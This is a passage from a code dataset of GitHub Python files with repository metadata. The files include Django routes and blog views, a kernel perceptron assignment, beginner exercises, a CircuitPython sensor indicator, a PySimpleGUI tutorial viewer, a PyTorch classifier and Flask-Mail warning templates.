r'^$',views.index, name ='index' ),\n\n url( r'^groups$',views.groups, name ='groups' ),\n url( r'^group/(?P\\d+)$', views.group, name='group' ),\n url( r'^groupedit/(?P\\d+)$', views.groupedit, name='groupedit'),\n url( r'^groupdelete/(?P\\d+)$', views.groupdelete, name='groupdelete'),\n url( r'^groupcreate/$', views.groupcreate, name='groupcreate' ),\n \n url( r'^students$',views.students, name ='students' ),\n url( r'^student/(?P\\d+)$',views.student, name ='student' ),\n url( r'^studentedit/(?P\\d+)$', views.studentedit, name='studentedit'),\n \n url( r'^teachers$', views.teachers, name='teachers'),\n url( r'^teacher/(?P\\d+)$', views.teacher, name='teacher' ),\n url( r'^teachercreate/$', views.teachercreate, name='teachercreate' ),\n url( r'^teacheredit/(?P\\d+)$', views.teacheredit, name='teacheredit'),\n url( r'^teacherdelete/(?P\\d+)$', views.teacherdelete, name='teacherdelete'),\n\n url( r'^users/$', views.users, name='users' ),\n url( r'^userManager/$',views.userManager, name ='userManager' )\n]\n","repo_name":"Kolemannn/KR","sub_path":"django/example1/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833654960","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport warnings\nfrom tqdm import tqdm\nimport time\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nwarnings.filterwarnings('ignore')\n\ntrain = pd.read_csv('../IA2-train.csv')\ndev = pd.read_csv('../IA2-dev.csv')\n\n# np.random.shuffle(train.values)\n# np.random.shuffle(dev.values)\n\n# normalization\nnumerical_col = ['Age', 'Annual_Premium', 'Vintage']\nnumerical_col_mean = []\nnumerical_col_std = []\n\nfor col in numerical_col:\n numerical_col_mean.append(train[col].mean())\n numerical_col_std.append(train[col].std())\n train[col] = (train[col] - train[col].mean()) / train[col].std()\n\ndev = pd.read_csv('../IA2-dev.csv')\n\nfor i, col in enumerate(numerical_col):\n dev[col] = (dev[col] - numerical_col_mean[i]) / numerical_col_std[i]\n\n# replace target 0 with -1\ntrain['Response'][train['Response'] == 0] = -1\ndev['Response'][dev['Response'] == 0] = -1\n\n\ndef predict_acc(x, y, w):\n return (np.where(x.dot(w) >= 0, 1, -1) == y).mean()\n\n\ndef kernel_function(x1, x2, p):\n return np.power(np.dot(x1, x2.T), p)\n\n\n# print(train.iloc[0, :-1])\n# print(kernel_function(dev.iloc[:, :-1], train.iloc[:, :-1], 1).shape)\n\n\ndef kernelized_perceptron(data, p, max_iter=100, training_size=6000):\n train, dev = data\n data = pd.concat([train, dev])\n x, y = data.iloc[:training_size, :-1], data.iloc[:training_size, -1]\n dev_x, dev_y = data.iloc[training_size:, :-1], data.iloc[training_size:, -1]\n\n start = time.time()\n\n k_train = kernel_function(x, x, p)\n k_valid = kernel_function(dev_x, x, p)\n a = np.zeros(x.shape[0])\n\n train_acc_his = []\n valid_acc_his = []\n\n for _ in tqdm(range(max_iter)):\n train_acc = 0\n valid_acc = 0\n\n u = np.dot(k_train, a * y)\n S = np.where((y * u) <= 0, 1, 0)\n a = a + S\n\n train_acc = x.shape[0] - S.sum()\n\n valid_acc = np.where((np.dot(k_valid, a * y) * dev_y) > 0, 1, 0).sum()\n\n train_acc_his.append(train_acc / train.shape[0])\n valid_acc_his.append(valid_acc / dev.shape[0])\n\n end = time.time()\n\n with open(\"train_acc_\" + str(p) + \".pkl\", 'wb') as f:\n pickle.dump(train_acc_his, f)\n\n with open(\"valid_acc_\" + str(p) + \".pkl\", 'wb') as f:\n pickle.dump(valid_acc_his, f)\n\n return end - start\n\n\n######################################################################################\n# (a)\n\nkernelized_perceptron((train, dev), 1)\n\nwith open(\"train_acc_\" + str(1) + \".pkl\", 'rb') as f:\n train_acc_his = pickle.load(f)\nwith open(\"valid_acc_\" + str(1) + \".pkl\", 'rb') as f:\n valid_acc_his = pickle.load(f)\n\nfig, ax = plt.subplots()\nax.plot(train_acc_his, label=\"train accuracy\")\nax.plot(valid_acc_his, label=\"validation accuracy\")\nplt.legend()\nplt.title(\"accuracy with p=\" + str(1))\nplt.savefig(\"accuracy_p\" + str(1) + \".png\")\n\nprint(\" \")\n\n######################################################################################\n# (b)\n\nrun_time = {}\n\nfor ts in [10, 100, 1000, 10000]:\n run_time[str(ts)] = kernelized_perceptron((train, dev), 1, training_size=ts)\n\nprint(run_time)\nfig, ax = plt.subplots()\nax.bar(run_time.keys(), run_time.values())\nplt.title(\"run time respect to the size of training set\")\nplt.savefig(\"time.png\")\nprint(\" \")\n","repo_name":"tso2381637/AI534","sub_path":"IA3/part2b/IA3_part2b.py","file_name":"IA3_part2b.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19733170499","text":"#!/usr/bin/python3\n\"\"\"[python script to calculate island perimeter]\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"[island_perimeter]\n\n Args:\n grid ([list of list of integers]): [island]\n\n Returns:\n [integer]: [perimeter of the island]\n \"\"\"\n area = 0\n for row in grid + list(map(list, zip(*grid))):\n for i, j in zip([0] + row, row + [0]):\n area += int(i != j)\n return area\n","repo_name":"IhebChatti/holbertonschool-interview","sub_path":"0x1C-island_perimeter/0-island_perimeter.py","file_name":"0-island_perimeter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2966661607","text":"n = input()\na = [0]*10\n\nfor i in str(n):\n digit = int(i)\n a[digit]+=1\n\nfor i in range(10):\n if a[i]>0:\n print(i, a[i])\n\nn = input()\n# ls = [i for i in input()]\nls = list(map(int, input().split()))\n# print(ls)\nminnls = []\n\nfor i in range(len(ls)):\n minn = min(ls)\n minnls.append(minn)\n ls.remove(minn)\n\nprint(*minnls)\n\nsadasda = int(input())\nn = list(map(int,input().split()))\ncount = [0]*201\nfor i in n:\n count[i+100]+=1\nprint(count)\nfor i in range(201):\n if count[i]>0:\n print((str(i-100)+' ')*count[i], end = '')\nprint(count)\n# print(count)\n","repo_name":"InfectedRat/legendary-octo-doodle","sub_path":"5.4 stepik.py","file_name":"5.4 stepik.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34344892731","text":"from setuptools import setup, find_packages\n\nversion = \"1.0\"\nsetup(name=\"chomp\",\n packages=find_packages(),\n version=version,\n description=\"Staffjoy V1 Forecast to Shifts Decomposition Tool\",\n author=\"Philip Thomas\",\n author_email=\"philip@staffjoy.com\",\n license=\"MIT\",\n url=\"https://github.com/staffjoy/chomp-decomposition\",\n download_url=\"https://github.com/StaffJoy/chomp-decomposition/archive/%s.tar.gz\" % version,\n keywords=[\"staffjoy-api\", \"staffjoy\", \"staff joy\", \"chomp\"],\n install_requires=[\"requests[security]\"], )\n\n\n","repo_name":"Staffjoy/chomp-decomposition","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"27675287984","text":"print('===== LOJA SUPER BARATAO =====')\nsoma = produtomais1000 = barato = c = 0\nnomebarato = ''\n\nwhile True:\n print('')\n produto = str(input('NOME DO PRODUTO: '))\n preco = float(input('PREÇO DO PRODUTO: '))\n\n soma = soma + preco\n\n if preco > 1000:\n produtomais1000 += 1\n\n c += 1\n\n if c == 1 or preco < barato:\n barato = preco\n nomebarato = produto\n\n continuar = str(input('DESEJA CONTINUAR[S/N]: '))\n \n while continuar not in 'SsNn':\n continuar = str(input('DESEJA CONTINUAR[S/N]: '))\n \n if continuar in 'Nn':\n break\n\nprint('')\nprint('O TOTAL DAS COMPRAS FOI DE R$: {} '.format(soma))\nprint('HÁ {} PRODUTOS COM PREÇO MAIOR DE R$ 1000,00'.format(produtomais1000))\nprint('O PRODUTO MAIS BARATO É A {} QUE CUSTA {}'.format(nomebarato, barato))\n","repo_name":"CarlosNazario2010/Python-Fundamentos-1","sub_path":"69_FazendoCompras.py","file_name":"69_FazendoCompras.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38661904261","text":"from matplotlib import pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom matplotlib.collections import PolyCollection\r\nimport numpy as np\r\nimport random\r\n\r\nfrom single_sample_data import cell_count_list\r\n\r\npath = \"C:/Users/Jordan Chen/Desktop/要的/實驗室/data/2022 data/ROS/ROS_DHE excel檔/\"\r\n\r\nfig = plt.figure()\r\nax = plt.axes(projection='3d')\r\n\r\nyaxis = 0\r\ndy = 0.01\r\ndx = 0.01\r\n\r\ndata1 = cell_count_list(\"WT1_0\", 0, path)\r\ndata2 = cell_count_list(\"WT1_4\", 0, path)\r\ndata3 = cell_count_list(\"WT1_6\", 0, path)\r\ndata4 = cell_count_list(\"WT1_8\", 0, path)\r\ndata5 = cell_count_list(\"WT1_12\", 0, path)\r\n\r\ndef plot_(data, n = 1 , color=\"silver\"): #n:第幾行(y軸)\r\n\tdata_h = plt.hist(data, bins=300, alpha = 0, color = color)\r\n\tz = list(data_h[0])\r\n\tz.append(0)\r\n\tax.bar3d(data_h[1] , (n-1)* 50 , 0, dx, dy , z , color= color)\r\n\r\nplot_(data1, 1, \"black\")\r\nplot_(data2, 2, \"silver\")\r\nplot_(data3, 3)\r\nplot_(data4, 4)\r\nplot_(data5, 5)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"jordanchen1112/Image","sub_path":"3Dplot.py","file_name":"3Dplot.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70866495413","text":"import board\nfrom microcontroller import watchdog as w\nfrom microcontroller import nvm\nfrom watchdog import WatchDogMode\nimport circuitpython_schedule as schedule\n\nfrom display import Display\nfrom neokeys import NeoKeys\nfrom net import Net\nfrom env import Env\n\nw.timeout=300 # Set a timeout of 5 minutes\nw.mode = WatchDogMode.RESET\n\nnet = Net()\nnet.connect()\nntp_time = net.time()\nmqtt = net.mqtt()\n\ni2c_bus = board.I2C()\nenv = Env(i2c_bus)\nneokeys = NeoKeys(i2c_bus)\ndisplay = Display(env, ntp_time)\n\n#Global Mutable State\nbutton_state = nvm[0]\nif button_state < 0 or button_state > 3:\n button_state = 2\nlast_ts = ntp_time.now()\n\ndef tick():\n # diff = last_ts.timestamp() - ntp_time.now().timestamp()\n diff = ntp_time.now().timestamp()\n neokeys.leds(button_state)\n display.show(button_state, diff)\n\nschedule.every(10).seconds.do(tick)\nschedule.every(1).minutes.do(mqtt.env_lambda(env))\nschedule.every().hour.do(ntp_time.sync_time)\n\ndef set_state(new_state):\n global button_state\n nvm[0] = new_state\n if button_state != new_state:\n mqtt.button_event(new_state, button_state)\n last_ts = ntp_time.now()\n button_state = new_state\n tick()\n\ntick()\n\nwhile True:\n key = neokeys.scan()\n if key >= 0:\n set_state(key)\n schedule.run_pending()\n","repo_name":"BrianEdwards85/indicator","sub_path":"esp32/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22269076628","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom Blog.models import Article, Category, Banner, Tag, Link\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport markdown\n\n\ndef global_variable(request):\n name = Category.objects.all()\n remen = Article.objects.filter(tui_id=3)[:6]\n tags = Tag.objects.all()\n return locals()\n\n\ndef index(request):\n article = Article.objects.all().order_by('-id')[0:10]\n tui = Article.objects.filter(tui_id=2)[:3]\n ban = Banner.objects.filter(is_active=True)[0:4]\n hot = Article.objects.all().order_by('views')[:10]\n link = Link.objects.all()\n return render(request, 'index.html', locals())\n\n\ndef list(request, lid):\n list = Article.objects.filter(category_id=lid) # 获取URL传进来的lid\n cname = Category.objects.get(id=lid) # 获取当前文章的栏目名\n page = request.GET.get('page') # 在URL中获取当前页面数\n paginator = Paginator(list, 2) # 对查询到的数据对象list进行分页,超过5条就分页\n try:\n list = paginator.page(page) # 获得当前页码的记录\n except PageNotAnInteger:\n list = paginator.page(1) # 如果用户输入的不是整数时,显示第一页的内容\n except EmptyPage:\n list = paginator.page(paginator.num_pages) # 如果用户输入的页码不是系统页码列表中时,显示最后一页\n return render(request, 'list.html', locals()) # locals()的作用是返回一个包含当前作用域里面的所有变量和它们的值的字典\n\n\ndef show(request, sid):\n show = Article.objects.get(id=sid) # 查询指定ID的文章\n allcategory = Category.objects.all() # 导航上的分类\n hot = Article.objects.all().order_by('?')[:10] # 随机推荐\n show.body = markdown.markdown(show.body,extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ])\n precious_blog = Article.objects.filter(created_time__gt=show.created_time, category=show.category.id).first()\n next_blog = Article.objects.filter(created_time__lt=show.created_time, category=show.category.id).last()\n show.views = show.views + 1\n show.save()\n page = request.GET.get('page')\n list = show.body\n paginator = Paginator(list, 2000) # 超过2000字就分页\n try:\n list = paginator.page(page)\n except PageNotAnInteger:\n list = paginator.page(1)\n except EmptyPage:\n list = paginator.page(paginator.num_pages)\n return render(request, 'show.html', locals())\n\n\ndef tag(request, tag):\n list = Article.objects.filter(tags__name=tag) # 通过筛选标签查找对于的文章\n tname = Tag.objects.get(name=tag)\n page = request.GET.get('page')\n paginator = Paginator(list,2) # 超过2条就分页\n try:\n list = paginator.page(page)\n except PageNotAnInteger:\n list = paginator.page(1)\n except EmptyPage:\n list = paginator.page(paginator.num_pages)\n return render(request,'tags.html',locals())\n\n\ndef search(request):\n ss = request.GET.get('search') # 获取搜索的关键字\n list = Article.objects.filter(Q(title__icontains=ss)|Q(body__icontains=ss)) # 将获取的关键字在数据库中匹配筛选,icontains是忽略大小写,contains是精确查找,区分大小写\n page = request.GET.get('page')\n paginator = Paginator(list, 2)\n try:\n list = paginator.page(page)\n except PageNotAnInteger:\n list = paginator.page(1)\n except EmptyPage:\n list = paginator.page(paginator.num_pages)\n return render(request, 'search.html', locals())\n\n\ndef about(request):\n allcategory = Category.objects.all()\n return render(request, 'page.html', locals())\n","repo_name":"NOTLOOK/newDjango","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28768070891","text":"import sys\nimport time\nimport os\nimport json\nimport configparser\nfrom datetime import datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n from jsonfile import JsonFile\n from utils import compress_abs_path\nelse:\n from .jsonfile import JsonFile\n from .utils import compress_abs_path\n\nimport PySimpleGUI as sg\n\n\nTUTORIAL_JSON_FILE = 'tutorial.json'\nLESSON_JSON_FILE = 'lesson.json'\nLESSON_DIR = 'lesson'\n\n###############################################################################\n\nclass TutorialJson(JsonFile):\n \"\"\"\n Manage tutor and lesson JSON files. Keep tag names and formats consistent.\n The tutor and lesson JSON files have nearly idenical keys and since this is\n not a generic utility this one class takes care of both file types.\n \"\"\"\n def __init__(self, json_file):\n super().__init__(json_file)\n \n def lesson_slide(self):\n return self.json['current-slide']\n\n def lesson_complete(self):\n return self.json['complete']\n\n def reset_child(self):\n if 'current-slide' in self.json:\n self.json['current-slide'] = 1\n self.json['complete'] = False\n\n def set_complete(self, complete):\n self.json['complete'] = complete\n\n def set_slide(self, slide):\n self.json['current-slide'] = slide\n \n \n###############################################################################\n\n\nclass Lesson():\n \"\"\"\n Manage the display for a lesson. The lesson's JSON file is used to \n determine the initial state. The execute() method allows a lesson to be\n restarted and override the JSON. The new lesson state is recorded in the\n JSON when the lesson is exited.\n \"\"\"\n def __init__(self, number, path, slides):\n\n self.number = number\n self.path = path\n self.slides = slides\n self.slide_max = len(slides)\n self.load_json()\n\n def load_json(self):\n \n self.json = TutorialJson(os.path.join(self.path, LESSON_JSON_FILE))\n \n self.title = self.json.title()\n self.cur_slide = self.json.lesson_slide()\n self.complete = self.json.lesson_complete()\n\n \n def update_slide_file(self):\n self.slide_file = os.path.join(self.path, self.slides[self.cur_slide-1])\n \n \n def gui(self):\n \n self.update_slide_file()\n \n layout = [\n [sg.Text('Slide'), sg.Text(str(self.cur_slide), pad=(2,1), key='-SLIDE-')], \n [sg.Image(filename=self.slide_file, key='-IMAGE-')],\n [sg.Button('Prev', size=(8,2)), sg.Button('Next', size=(8, 2)), sg.Button('Mark as Complete', pad=(10,0))]\n ]\n \n self.window = sg.Window(self.json.title(), layout, element_justification='c', resizable=True, modal=True)\n \n while True:\n\n self.event, self.values = self.window.read()\n \n if self.event in (sg.WIN_CLOSED, 'Exit') or self.event is None:\n break\n\n if self.event == 'Mark as Complete':\n self.json.set_complete(True)\n break\n \n if self.event == 'Prev':\n if self.cur_slide > 1:\n self.cur_slide -= 1\n \n elif self.event == 'Next':\n if self.cur_slide < self.slide_max:\n self.cur_slide += 1\n \n self.update_slide_file()\n logger.debug(\"filename = \" + self.slide_file)\n \n self.window['-SLIDE-'].update(str(self.cur_slide))\n self.window['-IMAGE-'].update(filename=self.slide_file)\n\n self.json.set_slide(self.cur_slide)\n self.json.update()\n self.window.close() \n\n \n def execute(self):\n self.gui()\n return self.json.lesson_complete()\n \n def reset(self):\n self.json.reset()\n self.load_json()\n\n\n###############################################################################\n\n\nclass Tutorial():\n \"\"\"\n Manage the display for a tutorial. A tutorial folder contains a\n tutorial.json that describes the tutorial and a lesson folder that \n contains numbered lesson folders. Each lesson folder contains a \n lesson.json file. \n \"\"\"\n def __init__(self, tutorial_path):\n\n self.path = tutorial_path\n self.json = TutorialJson(os.path.join(tutorial_path, TUTORIAL_JSON_FILE))\n \n self.lesson_path = os.path.join(tutorial_path,LESSON_DIR)\n logger.info(\"self.lesson_path = \" + self.lesson_path)\n self.lesson_list = [int(l) for l in os.listdir(self.lesson_path) if l.isnumeric()]\n self.lesson_list.sort()\n logger.info(\"self.lesson_list = \" + str(self.lesson_list))\n self.lesson_objs = {}\n for l in self.lesson_list:\n lesson_num_path = os.path.join(self.lesson_path, str(l))\n logger.info(\"lesson_num_path = \" + lesson_num_path)\n lesson_pngs = [f for f in os.listdir(lesson_num_path) if f.lower().endswith('.png')]\n lesson_pngs.sort()\n logger.info(\"lesson_pngs = \" + str(lesson_pngs))\n self.lesson_objs[l] = Lesson(l, lesson_num_path, lesson_pngs)\n \n self.display = True\n self.reset = False\n\n def create_window(self):\n \"\"\"\n Create the main window. Non-class variables are used so it can be refreshed, PySimpleGui\n layouts can't be shared.\n \"\"\"\n hdr_label_font = ('Arial bold',12)\n hdr_value_font = ('Arial',12)\n \n objective_text = \"\"\n for objective_line in self.json.objective():\n objective_text += objective_line\n\n resume_lesson = 1\n for lesson in self.lesson_objs.values():\n if lesson.complete:\n resume_lesson += 1\n else:\n break\n \n lesson_layout = []\n for lesson in self.lesson_objs.values():\n logger.debug(\"Lesson Layout \" + lesson.title)\n title = \"%d-%s\" % (lesson.number, lesson.title)\n complete_state = \"Yes\" if lesson.complete else \"No\"\n radio_state = True if lesson.number == resume_lesson else False\n lesson_layout.append([sg.Radio(title, \"LESSONS\", default=radio_state, font=hdr_value_font, size=(30,0), key='-LESSON%d-'%lesson.number), sg.Text(complete_state, key='-COMPLETE%d-'%lesson.number)])\n \n \n # Layouts can't be reused/shared so if someone does a tutorial reset it casues issues if layout is a class variable\n layout = [\n [sg.Text('Objectives', font=hdr_label_font)],\n [sg.MLine(default_text=objective_text, font = hdr_value_font, size=(40, 4))],\n # Lesson size less than lesson layout so complete status will appear centered \n [sg.Text('Lesson', font=hdr_label_font, size=(28,0)),sg.Text('Complete', font=hdr_label_font, size=(10,0))], \n lesson_layout, \n [sg.Button('Start', button_color=('SpringGreen4')), sg.Button('Reset'), sg.Button('Exit')]\n ]\n\n window = sg.Window(self.json.title(), layout, modal=True)\n return window\n \n \n def gui(self):\n \"\"\"\n Navigating through lessons is not strictly enforced. The goal is to keep the user\n interface very simple so the algotihm to determine which lesson to resume is simplistic\n and it's up to the user whether they select lessons as completed.\n \"\"\"\n \n while self.display:\n\n window = self.create_window()\n\n while True: # Event Loop\n\n self.event, self.values = window.read(timeout=100)\n \n if self.event in (sg.WIN_CLOSED, 'Exit') or self.event is None: \n break\n \n if self.event == 'Start':\n for lesson in self.lesson_objs:\n if self.values[\"-LESSON%d-\"%lesson] == True:\n if self.lesson_objs[lesson].execute():\n window['-COMPLETE%d-'%lesson].update('Yes') \n \n if self.event == 'Reset':\n for lesson in list(self.lesson_objs.values()):\n lesson.reset() \n self.reset = True\n break\n \n self.json.update()\n window.close()\n \n if self.reset:\n self.reset = False\n else:\n self.display = False\n \n def execute(self):\n self.gui()\n\n\n###############################################################################\n\nclass ManageTutorials():\n \"\"\"\n Discover what tutorials exists (each tutorial in separate directory) and\n create a 'database' of information about the tutorials based on each \n tutorial's JSON spec.\n User select tutorials based by title so self.tutorial_lookup provides a\n method to retreive a tutorial given its title\n \"\"\"\n def __init__(self, tutorials_path):\n\n self.path = tutorials_path\n self.tutorial_titles = []\n self.tutorial_lookup = {} # [title] => Tutorial\n \n tutorial_list = os.listdir(tutorials_path)\n tutorial_list.sort()\n for tutorial_folder in tutorial_list:\n logger.debug(\"Tutorial folder: \" + tutorial_folder)\n #todo: Tutorial constructor could raise exception if JSON doesn't exist or is malformed\n tutorial_json_file = os.path.join(tutorials_path, tutorial_folder, TUTORIAL_JSON_FILE)\n if os.path.exists(tutorial_json_file):\n tutorial = Tutorial(os.path.join(tutorials_path, tutorial_folder))\n self.tutorial_titles.append(tutorial.json.title())\n self.tutorial_lookup[tutorial.json.title()] = tutorial\n \n logger.debug(\"Tutorial Titles \" + str(self.tutorial_titles))\n logger.debug(\"Tutorial Lookup \" + str(self.tutorial_lookup))\n\n def run_tutorial(self, tutorial_title):\n if tutorial_title in self.tutorial_titles:\n self.tutorial_lookup[tutorial_title].execute()\n\n\n###############################################################################\n\nif __name__ == '__main__':\n\n tutorial_rel_dir = None\n if len(sys.argv) > 1:\n tutorial_rel_dir = sys.argv[1]\n else:\n tutorial_rel_dir = '1-cfsat-overview'\n \n config = configparser.ConfigParser()\n config.read('../cfsat.ini')\n TUTORIALS_PATH = config.get('PATHS','TUTORIALS_PATH')\n\n tutorial_dir = compress_abs_path(os.path.join(os.getcwd(),'..', TUTORIALS_PATH, tutorial_rel_dir)) \n print (\"tutorial_dir = \" + tutorial_dir)\n tutorial = Tutorial(tutorial_dir)\n tutorial.execute()\n \n \n\n","repo_name":"OpenSatKit/cfsat","sub_path":"gnd-sys/app/tools/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"5914678160","text":"# coding: UTF-8\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass Config(object):\n \"\"\"配置参数\"\"\"\n\n def __init__(self, dataset, embedding):\n self.model_name = 'NN'\n self.train_path = dataset + '/data/train.txt' # 训练集\n self.dev_path = dataset + '/data/dev.txt' # 验证集\n self.test_path = dataset + '/data/test.txt' # 测试集\n self.class_list = [x.strip() for x in open(\n dataset + '/data/class.txt').readlines()] # 类别名单\n self.vocab_path = dataset + '/data/vocab.pkl' # 词表\n self.save_path = dataset + '/saved_dict/' + self.model_name + '.ckpt' # 模型训练结果\n self.log_path = dataset + '/log/' + self.model_name\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # 设备\n\n self.dropout = 0.5 # 随机失活\n self.require_improvement = 1000 # 若超过1000batch效果还没提升,则提前结束训练\n self.num_classes = len(self.class_list) # 类别数\n self.n_vocab = 0 # 词表大小,在运行时赋值\n self.num_epochs = 100 # epoch数\n self.batch_size = 128 # mini-batch大小\n self.pad_size = 200 # 每句话处理成的长度(短填长切)\n self.learning_rate = 1e-3 # 学习率\n self.hidden_size = 32 # 隐含层大小\n self.encode_size = 1024 # bert hidden size\n\n\n\n'''Neural Networks for Sentence Classification'''\n\n\nclass Model(nn.Module):\n def __init__(self, config):\n super(Model, self).__init__()\n self.dropout = nn.Dropout(config.dropout)\n self.fc1 = nn.Sequential(nn.Linear(config.pad_size * config.encode_size, config.hidden_size), nn.ReLU(True))\n self.fc2 = nn.Linear(config.hidden_size, config.num_classes)\n self.one_layer_fc = nn.Linear(config.encode_size, config.num_classes)\n self.input_size = config.encode_size\n self.batch_size = config.batch_size\n\n def forward(self, x):\n # print(x[0].shape)\n out = x[0].view(x[0].shape[0], self.input_size)\n out = self.one_layer_fc(out)\n return out\n","repo_name":"TsNFs/SecretProject","sub_path":"ChineseTextClassificationPytorch/models/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23108824597","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 29 07:47:13 2019\n\n@author: lzy\n\"\"\"\n\n#import pandas as pd\nimport datetime\n#import numpy as np\n#from pandas import DataFrame\n#import os, sys\n#from bs4 import BeautifulSoup as bs\n#from multiprocessing import Pool\nimport argparse\n\n\ngraphfiledir = './Graphs/'\ncsvfiledir = './Analysis/'\n\ndirs = {'CSV':csvfiledir, 'GRAPH':graphfiledir}\n\n\nparser = argparse.ArgumentParser(description='Introduction:\\t'\n 'Use this file to generate analysis files.\\n'\n 'Default values:\\n'\n '-a, default=\\\"指数\\\"\\n'\n '-na, default=\\\"货币, 债券, 理财, 现金, 分级\\\"\\n'\n '-sd/ed, default=[Years-1, Today]\\n'\n '-tP, Testing periods modes, default=customed\\n'\n '-s, stregaties to take\\n'\n '-f, frequency, usually try 14,31\\n'\n '-g, goal profit, usually try 0.05-0.2\\n')\n\nparser.add_argument('--aim', '-a', help='keywords', default='指数')\nparser.add_argument('--negativeaim', '-na', help='keywords to filter out', default='货币, 债券, 理财, 现金, 分级')\n\n\nparser.add_argument('--sdate', '-sd', help='begin date', default='2009-01-01')\n# default=datetime.datetime.today() - datetime.timedelta(days=365*10))\nparser.add_argument('--edate', '-ed', help='end date', default=datetime.datetime.today())\nparser.add_argument('--testingPeriod', '-tP', help='predefined periods', default=None)\nparser.add_argument('--stragety', '-s', help='different ways to invest, see details in ...', default=1)\nparser.add_argument('--frequency', '-f', help='how often do', default='14,31')\nparser.add_argument('--goalProfit', '-g', help='what is the goal profit', default='0.05,0.07,0.1,0.12,0.15,0.17,0.2')\nparser.add_argument('--output', '-ot', help='need the output in report? True as'\n 'report, False as databasefile, None as database', default=False)\n\n\nparser.add_argument('--single', '-sg', help='single fund', default=True)\nparser.add_argument('--code', '-fc', help='fund code', default='090010')\nparser.add_argument('--runWithin', '-rw', help='run within this file', default=True)\nparser.add_argument('--usingOutput', '-u', default=False)\n#parser.add_argument('--csvfiledir', '-cdir', default='./Analysis/')\n\n\nparser.add_argument('--database', '-db', default='funding_search.txt')\nparser.add_argument('--website', '-wb', default='http://fund.eastmoney.com/js/fundcode_search.js')\n\nargs = parser.parse_args()\n#database = pd.DataFrame(columns=funds.colName)\n\n#Possible values\n#'中证500'\n#'沪深300'\n#龙头\n#军工\n#医药\n#白酒\n#消费\n#\n#纳斯达克\n#\n#创业板\n#中小板\n\n\n#pool = Pool(3)\n#\n#for f in analysisF.FREQUENCY:\n# for aimP in np.arange(0.05, 0.25, 0.01):\n# dbanalysis = pool.apply_async(func=analysisF.analysisdata, \n# args=(fre=f, gProft=aimP, )).getValues()\n# database = database.append(dbanalysis)\n# \n#pool.close()\n#pool.join() \n#\n#print(1)\n ","repo_name":"billy31/Simple_Funds_","sub_path":"funds_extrance.py","file_name":"funds_extrance.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70357985014","text":"import os\nfrom dotenv import load_dotenv\nfrom flask_mail import Mail, Message\nfrom flask import render_template\nload_dotenv()\n\ndef createConsumptionWarning(value, date, recipients=[os.getenv('WARNING_RECIPIENT')], sender=os.getenv(\"MAIL_USERNAME\")):\n msg = Message(\n subject=\"Poraba kurilnega olja presegla dovoljeno mejo\", \n sender=sender, \n recipients=recipients,\n )\n msg.html = render_template(\"obvestilo_o_preveliki_porabi.html\", date=date, allowed=float(os.getenv('MAX_CONSUMPTION'))*1000, consumption=value)\n return msg\n\n\ndef createRefilWarning(value, date, amount, recipients=[os.getenv('WARNING_RECIPIENT',\"luka.cetina@student.um.si\")], sender=os.getenv(\"MAIL_USERNAME\",\"nadzornikgoriva@gmail.com\")):\n msg = Message(\n subject=\"Dolivanje kurilnega olja\",\n sender=sender,\n recipients=recipients,\n )\n msg.html = render_template(\"zaznano_polnjenje.html\", date=date, amount=amount, consumption=value)\n return msg\n\ndef negativeValueWarning(date, recipients=[os.getenv('WARNING_RECIPIENT')], sender=os.getenv(\"MAIL_USERNAME\")):\n msg = Message(\n subject=\"Negativna vrednost zaznana\",\n sender=sender,\n recipients=recipients,\n )\n msg.html = render_template(\"negativna.html\", date=date)\n return msg","repo_name":"CetinaLuka/BEST2022","sub_path":"backend/Modules/MailTemplates.py","file_name":"MailTemplates.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 